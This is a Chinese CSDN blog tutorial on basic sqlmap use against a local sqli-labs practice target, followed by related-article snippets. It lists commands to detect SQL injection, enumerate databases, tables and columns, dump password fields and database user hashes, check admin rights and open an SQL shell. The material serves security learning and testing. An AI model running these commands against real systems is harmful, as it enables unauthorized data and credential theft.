Sqlmap基本使用

最新推荐文章于 2023-09-07 11:45:00 发布
最新推荐文章于 2023-09-07 11:45:00 发布
阅读量199 收藏 1
点赞数
分类专栏: SQL注入 文章标签: 数据库 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xunhuanmao/article/details/126109037
版权

1、SQLmap入门

1)判断目标是否存在注入:

python sqlmap.py -u "http://192.168.30.129:90/sqli-labs/Less-1/?id=1"

2)判断文本中的请求是否存在注入

python sqlmap.py -r 1.txt  //适用于POST、cookie请求(GET也适用,BP抓包放入1.txt)

3)查询当前用户下的所有数据库

python sqlmap.py -u "http://192.168.30.129:90/sqli-labs/Less-1/?id=1" --dbs

4)获取数据库中的表名

python sqlmap.py -u "http://192.168.30.129:90/sqli-labs/Less-1/?id=1" -D dvwa --tables

5)获取表中的字段名

python sqlmap.py -u "http://192.168.30.129:90/sqli-labs/Less-1/?id=1" -D dvwa -T users --columns

6)获取字段内容

python sqlmap.py -u "http://192.168.30.129:90/sqli-labs/Less-1/?id=1" -D test -T users -C user_id,password --dump

7)获取数据库中的所有用户

python sqlmap.py -u "http://192.168.30.129:90/sqli-labs/Less-1/?id=1" --users

8)获取数据库用户的密码

python sqlmap.py -u "http://192.168.30.129:90/sqli-labs/Less-1/?id=1" --password

9)获取当前网站数据库的名字

python sqlmap.py -u "http://192.168.30.129:90/sqli-labs/Less-1/?id=1" --current-db

10)获取当前网站数据库的用户名称

python sqlmap.py -u "http://192.168.30.129:90/sqli-labs/Less-1/?id=1" --current-user

2、SQLmap进阶:参数详解

1)--level 5:探测等级

指需要执行的测试等级,1~5级,默认是1

--level 2 :会测试 HTTP cookie

--level 3 :会测试 user-agent/referer头

建议:不确定那个payload或参数为注入点时,建议使用最高的level值

2)--is-dba :当前用户是否为管理权限

如果是管理权限,会返回 True

3)--roles :列出数据库管理员角色

只使用于Oracle数据库

4)--referer :伪造HTTP Referer头

如:--referer 百度一下,你就知道

5)--sql-shell:运行自定义SQL语句

需熟悉数据库语句。

xi_9624
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlmap的基础使用
weixin_57478708的博客
02-04 547
有关sqlmap的一些相关基础知识
sqlmap基本使用方式(非常详细)零基础入门到精通,收藏这一篇就够了_sqlmap使用教程
最新发布
2401_84182758的博客
04-12 874
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。(都打包成一块的了,不能一一展开,总共300多集)
sqlmap基础使用
NSQ0207的博客
07-20 335
确定网站存在注入后,用于查询当前用户下的所有数据库。如果当前用户有权限读取包含所有数据库列表信息的表,使用该命令就可以列出所有相关数据库。如果不加入-D来指定某一个数据库,那么会列出数据库中的所有的表。列出数据库所有用户,如果当前用户有权限读取包含所有用户的表的权限时,使用该命令就可以列出所有管理用户。如果当前用户有读取包含用户密码的权限,sqlmap会先例举出用户,然后列出hash,并尝试破解。查询完表名后,查询该表中的字段名,在后续的注入中,—columns缩写成-C。3、查询当前用户下的所有数据库。
sqlmap最基础使用
qq_53030229的博客
09-05 191
一、sqlmap命令(这些是我整理出来的比较基础的命令) windows10下sqlmap安装 -h, --help 显示基本帮助信息 -hh 显示高级帮助信息(简单理解就是帮助信息更清晰) -u URL, --url=URL Target URL (e.g. “http://www.site.com/vuln.php?id=1”) –level=LEVEL Level of tests to perform (1-5, default 1) –
SQLMAP工具基础使用
紫洋的博客
03-27 495
本文用的是kali自带的sqlmap工具我们通过常用命令来理解sqlmap基本使用
SQLMAP使用笔记.pdf
01-25
一、SQLMAP基本使用 SQLMAP基本语法为:`sqlmap -u <url> [options]` 其中,`-u` 选项指定了要测试的 URL,`[options]` 是可选的参数和选项。 二、常用参数 1. `-f`:指定指纹判别数据库类型 2. `-b`:...
sqlmap使用手册
12-11
1. **安装与配置**: 首先,要在本地环境中安装SQLMap,了解基本的命令行选项和配置参数。 2. **理解注入类型**: 学习不同类型的SQL注入,如基于错误的注入、基于时间的注入、联合查询注入等。 3. **实战演练**: ...
SQLmap压缩包,SQLmap压缩包
06-07
使用SQLmap时,你需要了解基本的命令行选项,例如指定目标URL、选择测试方法、设置代理等。同时,了解如何正确和合法地使用这个工具至关重要,避免对未经授权的系统进行测试,以免触犯法律。 总的来说,SQLmap是一...
sqlmap使用手册集合
06-10
一、SQLMap基本概念 SQL注入是一种常见的网络安全威胁,攻击者通过输入恶意的SQL代码,控制或获取数据库中的敏感信息。SQLMap通过自动识别和利用这些注入漏洞,可以执行多种操作,如数据泄露、数据库权限提升甚至...
SQLMAP的注入使用
05-13
SQLMAP的注入使用 SQLMAP是一款强大的注入工具,相比经典的啊D和明小子之类的注入工具,SQLmap更加强大,无论是自带字典,功能还是界面优化,都是一款非常不错的注入工具。sqlmap可以多平台运行,windows,linux下...
SQLMAP基础使用 -u
Z_l123的博客
02-18 440
1.访问SQLi-Labs网站 访问Less-3,并根据网页提示给定一个GET参数 http://127.0.0.1/sqli-labs/Less-3/?id=1 2.启动SQLMAP 进入sqlmap目录,在搜索框输入cmd,并回车 3.寻找注入点 使用以下命令自动寻找网站的注入点,并获取网站及后台数据库的基本信息: python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-3/?id=1" 检测结果: 4.获.
sqlmap基本使用说明
sopora的博客
10-09 585
sqlmap基本参数 ___ __H__ ___ ___[(]_____ ___ ___ {1.2.3#stable} |_ -| . ["] | .'| . | |___|_ [)]_|_|_|__,| _| |_|V |_| http://sqlmap.org Usage: python sqlmap [op...
sqlmap基础使用手册 ─=≡Σ(((つ•̀ω•́)つ 知己知彼百战百胜 >web安全<
寻觅的博客
03-03 1719
文章目录sqlmap简介sqlmap特性sqlmap下载安装与启动sqlmap基础使用 sqlmap简介 顾名思义,sqlmap是一个自动化sql注入的开源的渗透工具,它可以自动化检测和利用SQL注入缺陷以及接管数据库服务器的过程。他有一个强大的检测引擎,许多适合于终极渗透测试的小众特性和广泛的开关,从数据库指纹、从数据库获取数据到访问底层文件系统和通过带外连接在操作系统上执行命令。官方网址 如果...
sqlmap工具学习记
m0_70483044的博客
07-20 610
sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。Sqlmap的强大的功能包括 数据库指纹识别、数据库枚举、数据提取、访问目标文件系统,并在获取完全的操作权限时执行任意命令。是sql注入方面一个强大的工具!...
sqlmap使用介绍(一、基本使用
风过江南乱的博客
07-28 1682
一、功能介绍 最直白的可以协助你进行sql注入,获取有用信息,一些简单的注入甚至可以用它一把梭。 最基本的,当你给一个可能有sql注入的url时,它能判断可注入的参数、判断可以用那种SQL注入技术来注入、识别出哪种数据库、据用户选择读取哪些数据。 再就是高大上的官方介绍,可自动执行SQL注入缺陷的检测和开发过程,并接管数据库服务器。它有强大的检测引擎,针对不同类型的数据库提供多样的渗透测试功能选项,实现数据库识别、数据获取、访问DBMS\操作系统甚至通过带外数据连接的方式执行操作系统的命令。,以及从数据库
SQLmap使用教程图文教程(非常详细)从零基础入门到精通,看完这一篇就够了。
A_991128a的博客
09-07 1459
SQLmap是一款「自动化」SQL注入工具,kali自带。路径 /usr/share/sqlmap打开终端,输入sqlmap,出现以下界面,就说明SQLmap「可用」。1、检测「注入点」2、查看所有「数据库」3、查看当前使用的数据库4、查看「数据表」5、查看「字段」6、查看「数据」
sqlmap使用教程
LFY2087701967的博客
04-10 699
总结如果命令是多个字母就用 -- 例如--dbs,--tables。单个字母就用-u,-r 等。删除缓存带cookie的注入:-r指定文件名和路径自动选择y/nsqlmap.py –update 更新sqlmapsqlmap.py -h 查看帮助sqlmap.py -version 查看版本sqlmap.py -u url 这里的-u参数就是注入点sqlmap.py -u url –is-dba 当前用户权限 返回True的话为管理员–dbs 列出所有数据库。
史上最详细的sqlmap使用教程
热门推荐
大河之犬的博客
09-19 4万+
sqlmapsqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等Sqlmap采用了以下5种独特的SQL注入技术基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入。
sqlmap基本使用方法
08-24
- *2* *3* [sqlmap基本使用方法](https://blog.csdn.net/jayjaydream/article/details/108555660)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值